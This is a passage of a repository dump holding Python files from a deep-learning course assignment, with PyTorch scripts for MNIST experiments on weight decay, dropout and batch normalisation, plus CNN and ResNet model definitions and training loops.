train_loader)\n\ttrain_loss.append(avg_loss)\n\ttrain_acc.append(accuracy)\n\tprint('| train loss: {:.4f}\\ttrain acc: {:.4f}'.format(avg_loss, accuracy))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, valid_loader)\n\tvalid_loss.append(avg_loss)\n\tvalid_acc.append(accuracy)\n\tprint('| valid loss: {:.4f}\\tvalid acc: {:.4f}'.format(avg_loss, accuracy))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, test_loader)\n\ttest_loss.append(avg_loss)\n\ttest_acc.append(accuracy)\n\tprint('| test loss: {:.4f}\\ttest acc: {:.4f}'.format(avg_loss, accuracy))\n\n\t# visualize kernels\n\t#misclassified = torch.ceil(torch.FloatTensor(misclassified).cuda() * 255.0)\n\t#visualize_kernel(misclassified,\n\t#\t\t\t\t im_name='misclassified_epoch_{}.jpg'.format(0),\n\t#\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\tvisualize_kernel(model.features[1].weight,\n\t\t\t\t\t im_name='conv1_kernel_epoch_{}.jpg'.format(0),\n\t\t\t\t\t model_name=model_name)\n\n\tfor epoch in range(1, total_epoch+1):\n\n\t\tprint('| epoch: {}'.format(epoch))\n\t\t_ = _train(model, train_loader, optimizer, verbose=False)\n\n\t\t# visualize kernels\n\t\tvisualize_kernel(model.features[1].weight,\n\t\t\t\t\t\t im_name='conv1_kernel_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t\t model_name=model_name)\n\t\t\n\t\t# output training status\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, train_loader)\n\t\ttrain_loss.append(avg_loss)\n\t\ttrain_acc.append(accuracy)\n\t\tprint('| train loss: {:.4f}\\ttrain acc: {:.4f}'.format(avg_loss, accuracy))\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, valid_loader)\n\t\tvalid_loss.append(avg_loss)\n\t\tvalid_acc.append(accuracy)\n\t\tprint('| valid loss: {:.4f}\\tvalid acc: {:.4f}'.format(avg_loss, accuracy))\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, test_loader)\n\t\ttest_loss.append(avg_loss)\n\t\ttest_acc.append(accuracy)\n\t\tprint('| test loss: {:.4f}\\ttest acc: {:.4f}'.format(avg_loss, accuracy))\n\n\tplot_acc_loss(train_loss, train_acc, valid_loss, valid_acc, test_loss, test_acc,\n\t\t\t\t model_name=model_name)\n\tplot_error(1-np.array(train_acc), 1-np.array(valid_acc), 1-np.array(test_acc),\n\t\t\t model_name=model_name)\n\n\t_, _, misclassified, ambiguous = _evaluate_data_set(model, test_loader, 25, 25)\n\tmisclassified = torch.ceil(torch.FloatTensor(misclassified).cuda() * 255.0)\n\tambiguous = torch.ceil(torch.FloatTensor(ambiguous).cuda() * 255.0)\n\tvisualize_kernel(misclassified,\n\t\t\t\t\t im_name='misclassified_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\tvisualize_kernel(ambiguous,\n\t\t\t\t\t im_name='ambiguous_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\t"
},
{
"alpha_fraction": 0.6061544418334961,
"alphanum_fraction": 0.6603444814682007,
"avg_line_length": 28.855491638183594,
"blob_id": "7423f33f0d6f8e2f806a2d519b6bf15edae85c13",
"content_id": "8877c8b1b5cd162cf3f635f1b8fc0b51f871533e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5167,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 173,
"path": "/part2/model.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\nclass Net(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper(Net, self).__init__()\n\n\t\tin_dim = 64, 64, 3\n\t\t# output shape: n x 64 x 64 x 32\n\t\tconv1_kern_size, conv1_out_chan, conv1_stride, conv1_pad = 5, 32, 1, 2\n\t\t# output shape: n x 31 x 31 x 32\n\t\tpool1_size, pool1_stride = 3, 2\n\t\t# output shape: n x 31 x 31 x 64\n\t\tconv2_kern_size, conv2_out_chan, conv2_stride, conv2_pad = 5, 64, 1, 2\n\t\t# output shape: n x 15 x 15 x 64\n\t\tpool2_size, pool2_stride = 3, 2\n\t\t# output shape: n x 15 x 15 x 128\n\t\tconv3_kern_size, conv3_out_chan, conv3_stride, conv3_pad = 3, 128, 1, 1\n\t\t# output shape: n x 15 x 15 x 128\n\t\tconv4_kern_size, conv4_out_chan, conv4_stride, conv4_pad = 3, 128, 1, 1\n\t\t# output shape: n x 7 x 7 x 128\n\t\tpool4_size, pool4_stride = 3, 2\n\n\t\tmlp1_out = 2048\n\t\tmlp2_out = 2048\n\t\tmlp3_out = 1\n\t\t\n\n\t\tself.features = nn.Sequential(\n\t\t\tnn.BatchNorm2d(in_dim[-1]),\n\t\t\tnn.Conv2d(in_dim[-1], conv1_out_chan, kernel_size=conv1_kern_size,\n\t\t\t\tstride=conv1_stride, padding=conv1_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool1_size, stride=pool1_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv1_out_chan),\n\t\t\tnn.Conv2d(conv1_out_chan, conv2_out_chan, kernel_size=conv2_kern_size,\n\t\t\t\tstride=conv2_stride, padding=conv2_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool2_size, stride=pool2_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv2_out_chan),\n\t\t\tnn.Conv2d(conv2_out_chan, conv3_out_chan, kernel_size=conv3_kern_size,\n\t\t\t\tstride=conv3_stride, padding=conv3_pad),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv3_out_chan),\n\t\t\tnn.Conv2d(conv3_out_chan, conv4_out_chan, kernel_size=conv4_kern_size,\n\t\t\t\tstride=conv4_stride, padding=conv4_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool4_size, stride=pool4_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv4_out_chan)\n\t\t\t)\n\n\t\tself.classifier = nn.Sequential(\n\t\t\tnn.Linear(7*7*conv4_out_chan, mlp1_out, bias=False),\n\t\t\tnn.BatchNorm1d(mlp1_out),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(mlp1_out, mlp2_out, bias=False),\n\t\t\tnn.BatchNorm1d(mlp2_out),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(mlp2_out, mlp3_out)\n\t\t\t)\n\n\t\tself.out_chan = conv4_out_chan\n\n\n\tdef forward(self, x):\n\t\tself.f = self.features(x)\n\t\tf = self.f.view(-1, 7*7*self.out_chan)\n\t\tc = self.classifier(f)\n\t\treturn c\n\nclass BottleneckBlock(nn.Module):\n\texpansion = 4\n\n\tdef __init__(self, in_chan, out_chan, stride=1, downsample=None):\n\n\t\tsuper(BottleneckBlock, self).__init__()\n\n\t\tself.conv1 = nn.Conv2d(in_chan, out_chan, kernel_size=1, bias=False)\n\t\tself.bn1 = nn.BatchNorm2d(out_chan)\n\t\tself.conv2 = nn.Conv2d(out_chan, out_chan, kernel_size=3, stride=stride,\n\t\t\t\t\t\t\t padding=1, bias=False)\n\t\tself.bn2 = nn.BatchNorm2d(out_chan)\n\t\tself.conv3 = nn.Conv2d(out_chan, out_chan * 4, kernel_size=1, bias=False)\n\t\tself.bn3 = nn.BatchNorm2d(out_chan * 4)\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.downsample = downsample\n\t\tself.stride = stride\n\n\tdef forward(self, x):\n\t\tresidual = x\n\n\t\tconv1 = self.conv1(x)\n\t\tconv1 = self.bn1(conv1)\n\t\tconv1 = self.relu(conv1)\n\n\t\tconv2 = self.conv2(conv1)\n\t\tconv2 = self.bn2(conv2)\n\t\tconv2 = self.relu(conv2)\n\n\t\tconv3 = self.conv3(conv2)\n\t\tconv3 = self.bn3(conv3)\n\n\t\tif 
self.downsample is not None:\n\t\t\tresidual = self.downsample(x)\n\n\t\tout = conv3 + residual\n\t\tout = self.relu(out)\n\n\t\treturn out\n\nclass ResNet(nn.Module):\n\n\tdef __init__(self, block, layers, num_classes=1):\n\t\tself.in_chan = 64\n\t\tsuper(ResNet, self).__init__()\n\t\tself.conv1 = nn.Conv2d(3, self.in_chan, kernel_size=5, stride=1, padding=3,\n\t\t\t\t\t\t\t bias=False)\n\t\tself.bn1 = nn.BatchNorm2d(self.in_chan)\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.maxpool = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n\t\tself.layer1 = self._make_layer(block, 64, layers[0])\n\t\tself.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n\t\tself.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n\t\tself.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\t\tself.avgpool = nn.AvgPool2d(7, stride=1)\n\t\tself.fc = nn.Linear(4608 * block.expansion, num_classes)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Conv2d):\n\t\t\t\tn = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n\t\t\t\tm.weight.data.normal_(0, math.sqrt(2. / n))\n\t\t\telif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.weight.data.fill_(1)\n\t\t\t\tm.bias.data.zero_()\n\n\tdef _make_layer(self, block, out_chan, blocks, stride=1):\n\n\t\tdownsample = None\n\t\tif stride != 1 or self.in_chan != out_chan * block.expansion:\n\t\t\tdownsample = nn.Sequential(\n\t\t\t\tnn.Conv2d(self.in_chan, out_chan * block.expansion,\n\t\t\t\t\t\t kernel_size=1, stride=stride, bias=False),\n\t\t\t\tnn.BatchNorm2d(out_chan * block.expansion),\n\t\t\t)\n\n\t\tlayers = []\n\t\tlayers.append(block(self.in_chan, out_chan, stride, downsample))\n\t\tself.in_chan = out_chan * block.expansion\n\t\tfor i in range(1, blocks):\n\t\t\tlayers.append(block(self.in_chan, out_chan))\n\n\t\treturn nn.Sequential(*layers)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.bn1(x)\n\t\tx = self.relu(x)\n\t\tx = self.maxpool(x)\n\t\tx = self.layer1(x)\n\t\tx = self.layer2(x)\n\t\tx = self.layer3(x)\n\t\tx = self.layer4(x)\n\n\t\tx = self.avgpool(x)\n\t\tx = x.view(x.size(0), -1)\n\t\tx = self.fc(x)\n\n\t\treturn x\n\n\n"
},
{
"alpha_fraction": 0.5561808347702026,
"alphanum_fraction": 0.5873194336891174,
"avg_line_length": 32.955413818359375,
"blob_id": "1a20e3d2e9ed1c0881e19d031b1da00030de91e0",
"content_id": "3e1655e93e6f4a005b02bff6e06d03587ee6a0f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5331,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 157,
"path": "/part1/b.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n torch.nn.init.xavier_uniform(m.weight.data)\n m.bias.data.fill_(0)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(784, 800)\n self.fc2 = nn.Linear(800, 800)\n self.do = nn.Dropout()\n self.fc = nn.Linear(800, 10)\n\n self.apply(weight_init)\n self.weights = [ self.fc1.weight, self.fc2.weight, self.fc.weight]\n\n def forward(self, x):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.do(tmp)\n tmp = self.fc(tmp)\n return F.log_softmax(tmp)\n\n def predict1(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.fc(tmp*0.5)\n return F.log_softmax(tmp)\n\n def predict2(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n pre_softmax = 0\n for _ in range(N):\n pre_softmax += 1.0/N * self.fc(self.do(tmp))\n return F.log_softmax(pre_softmax)\n\n def predict3(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n preds = 0\n for _ in range(N):\n pre_softmax = self.fc(self.do(tmp))\n preds += F.log_softmax(pre_softmax) * 1.0 / N\n return preds\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\noptimizer = optim.SGD(model.parameters(), lr=0.02)\n\n\n\ndef test(N, mode):\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n\n if mode == 1:\n output = model.predict1(data.view(-1, 784), N)\n if mode == 2:\n output = model.predict2(data.view(-1, 784), N)\n if mode == 3:\n output = model.predict3(data.view(-1, 784), N)\n\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. 
* correct / len(test_loader.dataset)))\n return 100. * correct / len(test_loader.dataset)\n\nfor epoch in range(1, args.epochs + 1):\n model.train()\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data), Variable(target)\n optimizer.zero_grad()\n output = model(data.view(-1, 784))\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n\nNs = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\ntest_accs1 = []\ntest_accs2 = []\ntest_accs3 = []\nfor N in Ns:\n test_accs1.append(test(N, 1))\n test_accs2.append(test(N, 2))\n test_accs3.append(test(N, 3))\n\nplt.figure()\nplt1, = plt.plot(Ns, test_accs1)\nplt2, = plt.plot(Ns, test_accs2)\nplt3, = plt.plot(Ns, test_accs3)\nplt.legend([plt1,plt2,plt3], [\"mode1\", \"mode2\", \"mode3\"])\nplt.savefig(\"compare_prediction.png\")\n"
},
{
"alpha_fraction": 0.4727668762207031,
"alphanum_fraction": 0.5001556277275085,
"avg_line_length": 35.10112380981445,
"blob_id": "21dd379572715a1c1644d8e281aa71f45845ec13",
"content_id": "2acce6a664acf0ab7a74f23640f98637a5cde771",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6426,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 178,
"path": "/part1/c.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--use-bn', action='store_true')\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n if not args.use_bn:\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=16,\n kernel_size=(3, 3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),stride=2),\n\n nn.Conv2d(in_channels=16,\n out_channels=32,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2)\n )\n else:\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=16,\n kernel_size=(3, 3),\n padding=1),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),stride=2),\n\n nn.Conv2d(in_channels=16,\n out_channels=32,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2)\n )\n self.clf = nn.Linear(128, 10)\n\n def forward(self, x):\n tmp = self.clf(self.conv(x).squeeze())\n return F.log_softmax(tmp)\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\n\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n output = model(data)\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += 
pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return 100. * correct / len(test_loader.dataset)\n\ntrain_accs = []\ntest_accs = []\nfor epoch in range(1, args.epochs + 1):\n model.train()\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data), Variable(target)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n train_accs.append(100. * correct / len(train_loader.dataset))\n test_accs.append(test())\n\nplt.figure()\ntr_plt, = plt.plot(train_accs)\nte_plt, = plt.plot(test_accs)\nplt.legend([tr_plt, te_plt], ['train_acc', 'test_acc'])\nplt.savefig('c_accs.png')\n"
},
{
"alpha_fraction": 0.6628878116607666,
"alphanum_fraction": 0.6718376874923706,
"avg_line_length": 31.882352828979492,
"blob_id": "1c576f139baaf82c33e33f8195d45a81d776330e",
"content_id": "e226f5ec5dee96f82c9b31a251b289f52621d49e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1676,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 51,
"path": "/part2/main.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\ndef parse():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-lr', '--learning_rate', default=1e-2, type=float,\n\t\t\t\t\t\thelp='Learning rate')\n\tparser.add_argument('-m', '--momentum', default=0.2, type=float, help=\"Momentum\")\n\tparser.add_argument('-s', '--seed', default=111, type=int, help='Random seed')\n\tparser.add_argument('--batch_size', default=64, type=int,\n\t\t\t\t\t\thelp='Mini-batch size for training')\n\tparser.add_argument('--test_batch_size', default=200, type=int,\n\t\t\t\t\t\thelp='Mini-batch size for testing')\n\tparser.add_argument('--epoch', default=13, type=int, help='Number of epochs')\n\tparser.add_argument('-o', '--optimizer', default='SGD', type=str, help='Optimizer')\n\tparser.add_argument('-n', '--model_name', default='model_1', type=str, help='Model name')\n\n\targs = parser.parse_args()\n\treturn args\n\ndef output_arguments(args):\n\tprint 'Model name:\\t\\t{}'.format(args.model_name)\n\tprint 'Seed:\\t\\t\\t{}'.format(args.seed)\n\tprint 'Total epoch:\\t\\t{}'.format(args.epoch)\n\tprint 'Batch size:\\t\\t{}'.format(args.batch_size)\n\tprint 'Learning rate:\\t\\t{}'.format(args.learning_rate)\n\tprint 'Optimizer:\\t\\t{}'.format(args.optimizer)\n\n\nif __name__ == '__main__':\n\n\targs = parse()\n\n\tprint 'Loading data...'\n\t#seperate_data()\n\ttrain_loader, valid_loader, test_loader = load_data(batch_size=args.batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttest_batch_size=args.test_batch_size)\n\n\tprint 'Loading model...\\n'\n\n\tmodel = Net()\n\n\toutput_arguments(args)\n\n\tif use_cuda:\n\t\tmodel.cuda()\n\n\trun(model, train_loader, valid_loader, test_loader, args.model_name, args.epoch,\n\t\targs.learning_rate, args.optimizer, args.momentum)"
},
{
"alpha_fraction": 0.587890625,
"alphanum_fraction": 0.6108940839767456,
"avg_line_length": 33.13333511352539,
"blob_id": "3b072b660c964464adcb2de7521629999586966a",
"content_id": "9eaad93b3d640a9083ad766061de15107691f43d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4608,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 135,
"path": "/part1/a.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--wd', type=float, default=2.5e-5)\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n torch.nn.init.xavier_uniform(m.weight.data)\n m.bias.data.fill_(0)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(784, 800)\n self.fc2 = nn.Linear(800, 800)\n self.fc = nn.Linear(800, 10)\n\n self.apply(weight_init)\n self.weights = [ self.fc1.weight, self.fc2.weight, self.fc.weight]\n\n def forward(self, x):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.fc(tmp)\n return F.log_softmax(tmp)\n\ndef model_l2_norm(model):\n norm = 0\n for p in model.weights:\n norm += p.pow(2).sum().data\n return norm[0]\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\noptimizer = optim.SGD(model.parameters(), lr=0.02, weight_decay=args.wd)\n\n\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n output = model(data.view(-1, 784))\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return 100. 
* correct / len(test_loader.dataset)\n\nnorms = []\ntrain_accs = []\ntest_accs = []\nfor epoch in range(1, args.epochs + 1):\n    model.train()\n    correct = 0\n    for batch_idx, (data, target) in enumerate(train_loader):\n        if args.cuda:\n            data, target = data.cuda(), target.cuda()\n        data, target = Variable(data), Variable(target)\n        optimizer.zero_grad()\n        output = model(data.view(-1, 784))\n        loss = F.nll_loss(output, target)\n        loss.backward()\n        optimizer.step()\n\n        pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n        correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n        norms.append(model_l2_norm(model))\n        if batch_idx % args.log_interval == 0:\n            print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n                epoch, batch_idx * len(data), len(train_loader.dataset),\n                100. * batch_idx / len(train_loader), loss.data[0]))\n    train_accs.append(100. * correct / len(train_loader.dataset))\n    test_accs.append(test())\n\nplt.figure()\nplt.plot(norms)\nplt.title(\"l2 norms\")\nplt.savefig('a_l2_norms.png')\n\nplt.figure()\ntr_plt, = plt.plot(train_accs)\nte_plt, = plt.plot(test_accs)\nplt.legend([tr_plt, te_plt], ['train_acc', 'test_acc'])\nplt.savefig('a_accs.png')\n"
},
{
"alpha_fraction": 0.3076923191547394,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "f9585651f253bb61ba686a693fe83f8dac58a885",
"content_id": "e5eb88f1a317cc37b9bf067478dc958064166657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/README.md",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "# IFT6135-A2\n"
}
] | 8 |
sakishum/My_Socket | https://github.com/sakishum/My_Socket | 31c2e8c032a91ad7a4fd5ca458534d2330c6ee8f | 02be0bb4a435c42a26efc56932baab7327d60d8b | 07cf29c77c868d340b977e8a7eaf0efd6f8435dd | refs/heads/master | 2021-01-11T14:24:48.738796 | 2017-02-09T00:13:58 | 2017-02-09T00:13:58 | 81,389,573 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5853881239891052,
"alphanum_fraction": 0.6127853989601135,
"avg_line_length": 20.8799991607666,
